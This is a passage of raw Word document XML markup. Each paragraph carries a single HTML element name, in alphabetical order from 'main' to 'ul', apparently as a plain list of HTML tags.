              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="071696B4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>map</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08A0368F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mark</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0559C426" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>menu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC6A21F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>menuitem</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62466191" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>meta</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4119DD81" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>meter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185371F0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>nav</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5446B005" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>noscript</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DB939F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>object</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20BB1281" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ol</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C1AD3D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>optgroup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781FD6D9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>option</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78822CED" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35028818" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2BCE45" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>param</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549506D4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pre</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7433E414" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>progress</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C1D725" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78674DED" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E2572BD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAF7707" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F76347C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rtc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C87D71" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ruby</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8156C1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EEA09F2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>samp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538C6EF7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D89E2B4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>section</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DCAFF96" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>select</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FBC026C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>small</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AB5B669" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>source</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0823B76F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>span</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D40D645" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>strong</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B68F0B5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>style</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E708DA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sub</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="714B5667" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>summary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723EAAFF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6932E2F5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>svg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6039C79D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>table</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23ABC07B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tbody</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F03FE7C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>td</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27469FAF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>template</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B68BEBC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>textarea</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C6A1B0C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tfoot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9C72A6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E73B99" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>thead</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E628A3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B1B6B4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>title</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36BAE7CA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5B0667" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>track</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1164FA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C5B9034" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ul</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB7FC60" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
